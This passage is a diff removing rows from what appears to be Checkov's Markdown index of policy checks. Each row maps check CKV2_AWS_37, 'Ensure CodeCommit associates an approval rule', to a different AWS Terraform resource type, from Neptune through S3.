-| 1241 | CKV2_AWS_37              | resource                         | aws_neptune_cluster_parameter_group                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1242 | CKV2_AWS_37              | resource                         | aws_neptune_cluster_snapshot                                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1243 | CKV2_AWS_37              | resource                         | aws_neptune_event_subscription                                                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1244 | CKV2_AWS_37              | resource                         | aws_neptune_parameter_group                                                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1245 | CKV2_AWS_37              | resource                         | aws_neptune_subnet_group                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1246 | CKV2_AWS_37              | resource                         | aws_network_acl                                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1247 | CKV2_AWS_37              | resource                         | aws_network_acl_rule                                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1248 | CKV2_AWS_37              | resource                         | aws_network_interface                                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1249 | CKV2_AWS_37              | resource                         | aws_network_interface_attachment                                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1250 | CKV2_AWS_37              | resource                         | aws_network_interface_sg_attachment                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1251 | CKV2_AWS_37              | resource                         | aws_opsworks_application                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1252 | CKV2_AWS_37              | resource                         | aws_opsworks_custom_layer                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1253 | CKV2_AWS_37              | resource                         | aws_opsworks_ganglia_layer                                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1254 | CKV2_AWS_37              | resource                         | aws_opsworks_haproxy_layer                                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1255 | CKV2_AWS_37              | resource                         | aws_opsworks_instance                                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1256 | CKV2_AWS_37              | resource                         | aws_opsworks_java_app_layer                                                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1257 | CKV2_AWS_37              | resource                         | aws_opsworks_memcached_layer                                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1258 | CKV2_AWS_37              | resource                         | aws_opsworks_mysql_layer                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1259 | CKV2_AWS_37              | resource                         | aws_opsworks_nodejs_app_layer                                                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1260 | CKV2_AWS_37              | resource                         | aws_opsworks_permission                                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1261 | CKV2_AWS_37              | resource                         | aws_opsworks_php_app_layer                                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1262 | CKV2_AWS_37              | resource                         | aws_opsworks_rails_app_layer                                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1263 | CKV2_AWS_37              | resource                         | aws_opsworks_rds_db_instance                                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1264 | CKV2_AWS_37              | resource                         | aws_opsworks_stack                                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1265 | CKV2_AWS_37              | resource                         | aws_opsworks_static_web_layer                                                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1266 | CKV2_AWS_37              | resource                         | aws_opsworks_user_profile                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1267 | CKV2_AWS_37              | resource                         | aws_organizations_account                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1268 | CKV2_AWS_37              | resource                         | aws_organizations_organization                                                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1269 | CKV2_AWS_37              | resource                         | aws_organizations_organizational_unit                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1270 | CKV2_AWS_37              | resource                         | aws_organizations_policy                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1271 | CKV2_AWS_37              | resource                         | aws_organizations_policy_attachment                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1272 | CKV2_AWS_37              | resource                         | aws_pinpoint_adm_channel                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1273 | CKV2_AWS_37              | resource                         | aws_pinpoint_apns_channel                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1274 | CKV2_AWS_37              | resource                         | aws_pinpoint_apns_sandbox_channel                                                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1275 | CKV2_AWS_37              | resource                         | aws_pinpoint_apns_voip_channel                                                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1276 | CKV2_AWS_37              | resource                         | aws_pinpoint_apns_voip_sandbox_channel                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1277 | CKV2_AWS_37              | resource                         | aws_pinpoint_app                                                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1278 | CKV2_AWS_37              | resource                         | aws_pinpoint_baidu_channel                                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1279 | CKV2_AWS_37              | resource                         | aws_pinpoint_email_channel                                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1280 | CKV2_AWS_37              | resource                         | aws_pinpoint_event_stream                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1281 | CKV2_AWS_37              | resource                         | aws_pinpoint_gcm_channel                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1282 | CKV2_AWS_37              | resource                         | aws_pinpoint_sms_channel                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1283 | CKV2_AWS_37              | resource                         | aws_placement_group                                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1284 | CKV2_AWS_37              | resource                         | aws_proxy_protocol_policy                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1285 | CKV2_AWS_37              | resource                         | aws_qldb_ledger                                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1286 | CKV2_AWS_37              | resource                         | aws_quicksight_group                                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1287 | CKV2_AWS_37              | resource                         | aws_quicksight_user                                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1288 | CKV2_AWS_37              | resource                         | aws_ram_principal_association                                                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1289 | CKV2_AWS_37              | resource                         | aws_ram_resource_association                                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1290 | CKV2_AWS_37              | resource                         | aws_ram_resource_share                                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1291 | CKV2_AWS_37              | resource                         | aws_ram_resource_share_accepter                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1292 | CKV2_AWS_37              | resource                         | aws_rds_cluster                                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1293 | CKV2_AWS_37              | resource                         | aws_rds_cluster_endpoint                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1294 | CKV2_AWS_37              | resource                         | aws_rds_cluster_instance                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1295 | CKV2_AWS_37              | resource                         | aws_rds_cluster_parameter_group                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1296 | CKV2_AWS_37              | resource                         | aws_rds_global_cluster                                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1297 | CKV2_AWS_37              | resource                         | aws_redshift_cluster                                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1298 | CKV2_AWS_37              | resource                         | aws_redshift_event_subscription                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1299 | CKV2_AWS_37              | resource                         | aws_redshift_parameter_group                                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1300 | CKV2_AWS_37              | resource                         | aws_redshift_security_group                                                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1301 | CKV2_AWS_37              | resource                         | aws_redshift_snapshot_copy_grant                                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1302 | CKV2_AWS_37              | resource                         | aws_redshift_snapshot_schedule                                                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1303 | CKV2_AWS_37              | resource                         | aws_redshift_snapshot_schedule_association                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1304 | CKV2_AWS_37              | resource                         | aws_redshift_subnet_group                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1305 | CKV2_AWS_37              | resource                         | aws_resourcegroups_group                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1306 | CKV2_AWS_37              | resource                         | aws_root                                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1307 | CKV2_AWS_37              | resource                         | aws_root_access_key                                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1308 | CKV2_AWS_37              | resource                         | aws_route                                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1309 | CKV2_AWS_37              | resource                         | aws_route53_delegation_set                                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1310 | CKV2_AWS_37              | resource                         | aws_route53_health_check                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1311 | CKV2_AWS_37              | resource                         | aws_route53_query_log                                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1312 | CKV2_AWS_37              | resource                         | aws_route53_record                                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1313 | CKV2_AWS_37              | resource                         | aws_route53_resolver_endpoint                                                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1314 | CKV2_AWS_37              | resource                         | aws_route53_resolver_rule                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1315 | CKV2_AWS_37              | resource                         | aws_route53_resolver_rule_association                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1316 | CKV2_AWS_37              | resource                         | aws_route53_vpc_association_authorization                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1317 | CKV2_AWS_37              | resource                         | aws_route53_zone                                                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1318 | CKV2_AWS_37              | resource                         | aws_route53_zone_association                                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1319 | CKV2_AWS_37              | resource                         | aws_route_table                                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1320 | CKV2_AWS_37              | resource                         | aws_route_table_association                                                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1321 | CKV2_AWS_37              | resource                         | aws_s3_access_point                                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1322 | CKV2_AWS_37              | resource                         | aws_s3_account_public_access_block                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1323 | CKV2_AWS_37              | resource                         | aws_s3_bucket                                                                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1324 | CKV2_AWS_37              | resource                         | aws_s3_bucket_analytics_configuration                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1325 | CKV2_AWS_37              | resource                         | aws_s3_bucket_inventory                                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1326 | CKV2_AWS_37              | resource                         | aws_s3_bucket_metric                                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1327 | CKV2_AWS_37              | resource                         | aws_s3_bucket_notification                                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1328 | CKV2_AWS_37              | resource                         | aws_s3_bucket_object                                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1329 | CKV2_AWS_37              | resource                         | aws_s3_bucket_policy                                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1330 | CKV2_AWS_37              | resource                         | aws_s3_bucket_public_access_block                                                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
